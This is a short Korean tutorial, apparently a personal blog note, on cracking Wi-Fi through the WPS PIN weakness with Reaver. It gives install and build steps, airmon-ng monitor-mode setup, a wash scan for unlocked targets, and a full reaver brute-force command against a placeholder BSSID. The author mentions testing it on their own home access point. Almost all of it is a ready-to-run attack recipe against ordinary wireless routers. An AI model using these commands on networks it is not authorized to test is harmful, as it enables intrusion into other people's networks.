apt-get install libpcap-dev libsqlite3-dev

2개의 패키지가 설치되어 있어야 함

그리고 아래 사이트에서 다운로드한다.

https://code.google.com/p/reaver-wps/

압축을 풀고

./configure

make && make install

airmon-ng를 실행시켜서 무선랜을 moniter mode로 전환, WPS Pin 공격이 가능한 대상이 있는지 채널 11을 scan(Locked가 No인 경우 공격 가능함)

airmon-ng start wlan0

wash -i mon0 -c 11 -C -s

그 후 brute force 공격 시작함

reaver -i mon0 -f -c 11 -b AA:AA:AA:AA:AA:AA -vv -x 60

아래 스샷은 집에 무선ap를 대상으로 시도한 결과인데, 집의 무선ap는 WPS 공격에 대비하여 60초 딜레이가 걸려 있어서 바로 PIN번호 입력해서 테스트 해봄

https://code.google.com/p/reaver-wps/wiki/README

http://adaywithtape.blogspot.kr/2012/01/cracking-wpa-using-wps-vulnerability.html